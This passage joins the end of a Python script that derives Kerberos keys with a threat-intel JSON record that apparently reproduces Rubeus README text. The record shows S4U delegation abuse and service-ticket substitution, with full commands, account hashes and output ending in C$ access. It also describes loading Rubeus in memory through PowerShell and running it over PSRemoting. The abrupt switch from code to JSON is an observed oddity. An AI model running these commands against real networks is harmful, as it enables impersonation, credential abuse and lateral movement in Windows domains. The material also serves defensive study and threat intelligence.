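    # plain single-block encryption, so ECB on that block is exact here.
    tkey = aes_tkey(password, realm, username, key_len)
    if not HAVE_AES:
        return None
    enc = Cipher(algorithms.AES(tkey), modes.ECB(), default_backend()).encryptor()
    k1 = enc.update(NFOLD_KERBEROS)
    k2 = enc.update(k1)
    enc.finalize()
    return (k1 + k2)[:key_len]


if __name__ == '__main__':
    # Inputs from the page; 'ghost' is a made-up second account for comparison.
    pw, realm, user = 'Password123!', 'testlab.local', 'harmj0y'
    print('Salt                 :', kerberos_salt(realm, user))
    print('rc4_hmac             :', nt_hash(pw).hex().upper())
    for name, n in (('aes128_cts_hmac_sha1', 16), ('aes256_cts_hmac_sha1', 32)):
        key = aes_string_to_key(pw, realm, user, n)
        print(name, ':', key.hex().upper() if key else '(needs cryptography)')
    print('AES tkey differs for ghost:', aes_tkey(pw, realm, user, 32) != aes_tkey(pw, realm, 'ghost', 32))
```

The reason Rubeus prints the salt: anyone cracking an AES-encrypted AS-REP or TGS-REP offline has to rebuild exactly this REALMuser string, so the account name and realm travel with the hash, whereas an rc4_hmac value is the same for every account that shares the password.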
Running the S4U process once for ldap/PRIMARY.testlab.local and then substituting cifs into the resulting ticket:\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:patsy /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /msdsspn:ldap/PRIMARY.testlab.local\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\patsy'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIE+jCCBPagAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'patsy@TESTLAB.LOCAL'\r\n[*] Sending S4U2self request\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'patsy@TESTLAB.LOCAL'\r\n[*] base64(ticket.kirbi):\r\n doIFXjCCBVqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Impersonating user 'harmj0y' to target SPN 'ldap/PRIMARY.testlab.local'\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'\r\n[*] Sending S4U2proxy request\r\n[+] S4U2proxy success!\r\n[*] base64(ticket.kirbi) for SPN 'ldap/PRIMARY.testlab.local':\r\n doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nAccess is denied.\r\nC:\\Rubeus\u003eRubeus.exe tgssub /ticket:doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)... 
/altservice:cifs /ptt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Service Ticket sname Substitution\r\n[*] Substituting in alternate service name: cifs\r\n[*] base64(ticket.kirbi):\r\n doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Describe Ticket\r\nUserName : harmj0y@TESTLAB.LOCAL\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : cifs/PRIMARY.testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 3/1/2019 12:51:06 PM\r\nEndTime : 3/1/2019 5:51:06 PM\r\nRenewTill : 3/8/2019 12:51:06 PM\r\nFlags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\nKeyType : aes128_cts_hmac_sha1\r\nBase64(key) : yxQVMhl0qn3P0wUUC4KnGQ==\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nVolume in drive \\\\primary.testlab.local\\C$ has no label.\r\nVolume Serial Number is A48B-4D68\r\nDirectory of \\\\primary.testlab.local\\C$\r\n07/05/2018 12:57 PM \u003cDIR\u003e dumps\r\n03/05/2017 04:36 PM \u003cDIR\u003e inetpub\r\n07/21/2018 07:41 PM 9 out.txt\r\n08/22/2013 07:52 AM \u003cDIR\u003e PerfLogs\r\n04/15/2017 05:25 PM \u003cDIR\u003e profiles\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files (x86)\r\n10/09/2018 12:04 PM \u003cDIR\u003e Temp\r\n08/23/2018 03:52 PM \u003cDIR\u003e Users\r\n10/25/2018 01:15 PM \u003cDIR\u003e Windows\r\n 1 File(s) 9 bytes\r\n 9 Dir(s) 40,463,851,520 bytes free\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: List Kerberos 
Tickets (Current User)\r\n[*] Current LUID : 0x6de14\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM\r\n Server Name : cifs/PRIMARY.testlab.local @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\n [1] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM\r\n Server Name : ldap/PRIMARY.testlab.local @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\nExecuting S4U2self alone with a machine account's hash and then substituting in the service name we want to abuse (the\r\nS4U2self ticket's sname is the bare account name primary$, so it is not usable for cifs/primary.testlab.local until it is\r\nrewritten):\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:primary$ /rc4:46b910dbe4514bd144b44cb554c256db /impersonateuser:harmj0y\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 46b910dbe4514bd144b44cb554c256db\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\primary$'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFIDCCBRygAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'primary$@TESTLAB.LOCAL'\r\n[*] Sending S4U2self request\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'primary$@TESTLAB.LOCAL'\r\n[*] base64(ticket.kirbi):\r\n doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...\r\nC:\\Rubeus\u003eRubeus.exe describe /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...\r\n ______ _\r\n(_____ \\ | |\r\n 
_____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Describe Ticket\r\nUserName : harmj0y@TESTLAB.LOCAL\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : primary$\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 3/1/2019 12:43:56 PM\r\nEndTime : 3/1/2019 5:43:56 PM\r\nRenewTill : 3/8/2019 12:43:56 PM\r\nFlags : name_canonicalize, ok_as_delegate, pre_authent, renewable\r\nKeyType : aes256_cts_hmac_sha1\r\nBase64(key) : X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=\r\n[!] Service ticket uses encryption key type 'aes256_cts_hmac_sha1', unable to extract hash and salt.\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nAccess is denied.\r\nC:\\Rubeus\u003eRubeus.exe purge\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\nLuid: 0x0\r\n[*] Action: Purge Tickets\r\n[+] Tickets successfully purged!\r\nC:\\Rubeus\u003eRubeus.exe tgssub /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)... 
/altservice:cifs/primary.testlab.loca\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.2\r\n[*] Action: Service Ticket sname Substitution\r\n[*] Substituting in alternate service name: cifs/primary.testlab.local\r\n[*] base64(ticket.kirbi):\r\n doIFpjCCBaKgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Describe Ticket\r\nUserName : harmj0y@TESTLAB.LOCAL\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : cifs/primary.testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 3/1/2019 12:43:56 PM\r\nEndTime : 3/1/2019 5:43:56 PM\r\nRenewTill : 3/8/2019 12:43:56 PM\r\nFlags : name_canonicalize, ok_as_delegate, pre_authent, renewable\r\nKeyType : aes256_cts_hmac_sha1\r\nBase64(key) : X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nVolume in drive \\\\primary.testlab.local\\C$ has no label.\r\nVolume Serial Number is A48B-4D68\r\nDirectory of \\\\primary.testlab.local\\C$\r\n07/05/2018 12:57 PM \u003cDIR\u003e dumps\r\n03/05/2017 04:36 PM \u003cDIR\u003e inetpub\r\n08/22/2013 07:52 AM \u003cDIR\u003e PerfLogs\r\n04/15/2017 05:25 PM \u003cDIR\u003e profiles\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files (x86)\r\n10/09/2018 12:04 PM \u003cDIR\u003e Temp\r\n08/23/2018 03:52 PM \u003cDIR\u003e Users\r\n10/25/2018 01:15 PM \u003cDIR\u003e Windows\r\n 1 File(s) 9 bytes\r\n 9 Dir(s) 40,462,831,616 bytes free\r\ncurrentluid\r\nThe currentluid action will display the current user's logon ID (LUID).\r\nC:\\Rubeus\u003eRubeus.exe currentluid\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| 
|_|____/|____/|_____)____/(___/\r\nv1.5.0\r\n[*] Action: Display current LUID\r\n[*] Current LogonID (LUID) : 0x121078 (1183864)\r\nlogonsession\r\nThe logonsession action will display information about the current context's logon session if not elevated, or all\r\nlogon sessions if elevated.\r\nC:\\Rubeus\u003eRubeus.exe logonsession\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.1.0\r\n[*] Action: Display current logon session information\r\n LUID : 0x28a8fd (2664701)\r\n UserName : harmj0y\r\n LogonDomain : THESHIRE\r\n SID : S-1-5-21-937929760-3187473010-80948926-1104\r\n AuthPackage : Kerberos\r\n LogonType : Interactive (2)\r\n Session : 1\r\n LogonTime : 6/9/2022 1:17:48 PM\r\n LogonServer : DC\r\n DnsDomainName : THESHIRE.LOCAL\r\n Upn : harmj0y@theshire.local\r\nIf elevated, the /current flag will display information for just the current logon session, and /luid:X will\r\ndisplay information about the specified logon session only.\r\nasrep2kirbi\r\nThe asrep2kirbi action will convert an AS-REP and a client key to a Kirbi.\r\nThe client key can be supplied as a Base64 encoded blob or as a hex string.\r\nkirbi\r\nThe kirbi action is used to manipulate Kirbis (KERB_CRED structures).\r\nCurrently it only supports modifying/inserting a session key using the /sessionkey:SESSIONKEY and\r\n/sessionetype:DES|RC4|AES128|AES256 arguments, passing the Kirbi in using the /kirbi:X argument.\r\nCompile Instructions\r\nWe are not planning on releasing binaries for Rubeus, so you will have to compile yourself :)\r\nRubeus has been built against .NET 3.5 and is compatible with Visual Studio 2019 Community Edition. 
Simply\r\nopen up the project .sln, choose \"Release\", and build.\r\nTargeting other .NET versions\r\nRubeus' default build configuration is for .NET 3.5, which will fail on systems without that version installed. To\r\ntarget Rubeus for .NET 4 or 4.5, open the .sln solution, go to Project -\u003e Rubeus Properties and change the\r\n\"Target framework\" to another version.\r\nSidenote: Building Rubeus as a Library\r\nTo build Rubeus as a library, under Project -\u003e Rubeus Properties -\u003e change Output type to Class Library.\r\nCompile, and add the Rubeus.dll as a reference to whatever project you want. Rubeus functionality can then be\r\ninvoked in a number of ways:\r\n// pass the Main method the arguments you want\r\nRubeus.Program.Main(\"dump /luid:3050142\".Split());\r\n// or invoke specific functionality manually\r\nRubeus.LSA.ListKerberosTicketDataAllUsers(new Rubeus.Interop.LUID());\r\nYou can then use ILMerge to merge the Rubeus.dll into your resulting project assembly for a single, self-contained file.\r\nSidenote: Running Rubeus Through PowerShell\r\nIf you want to run Rubeus in-memory through a PowerShell wrapper, first compile Rubeus and base64-encode\r\nthe resulting assembly:\r\n[Convert]::ToBase64String([IO.File]::ReadAllBytes(\"C:\\Temp\\Rubeus.exe\")) | Out-File -Encoding ASCII C:\\Temp\\rub\r\nRubeus can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the base64-\r\nencoded Rubeus assembly string):\r\n$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\r\nThe Main() method and any arguments can then be invoked as follows:\r\n[Rubeus.Program]::Main(\"dump /user:administrator\".Split())\r\nOr individual functions can be invoked:\r\n$TicketBytes = [convert]::FromBase64String('BASE64_KERB_TICKET')\r\n# start mmc.exe as netonly, not-hidden\r\n$LogonID = [Rubeus.Helpers]::CreateProcessNetOnly(\"mmc.exe\", $true)\r\n# apply the ticket to mmc's logon session\r\n[Rubeus.LSA]::ImportTicket($TicketBytes, $LogonID)\r\nSidenote Sidenote: Running Rubeus Over PSRemoting\r\nDue to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily,\r\nRubeus has a function to help with that.\r\nIf you follow the instructions in Sidenote: Running Rubeus Through PowerShell to create a Rubeus.ps1, append\r\nsomething like the following to the script:\r\n[Rubeus.Program]::MainString(\"triage\")\r\nYou should then be able to run Rubeus over PSRemoting with something like the following:\r\n$s = New-PSSession dc.theshire.local\r\nInvoke-Command -Session $s -FilePath C:\\Temp\\Rubeus.ps1\r\nAlternatively, Rubeus' /consoleoutfile:C:\\FILE.txt argument will redirect all output streams to the specified\r\nfile.\r\nSource: https://github.com/GhostPack/Rubeus",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://github.com/GhostPack/Rubeus"
	],
	"report_names": [
		"Rubeus"
	],
	"threat_actors": [],
	"ts_created_at": 1775434914,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/247dc916edbfc235152ec68294b5afea53f9b147.pdf",
		"text": "https://archive.orkl.eu/247dc916edbfc235152ec68294b5afea53f9b147.txt",
		"img": "https://archive.orkl.eu/247dc916edbfc235152ec68294b5afea53f9b147.jpg"
	}
}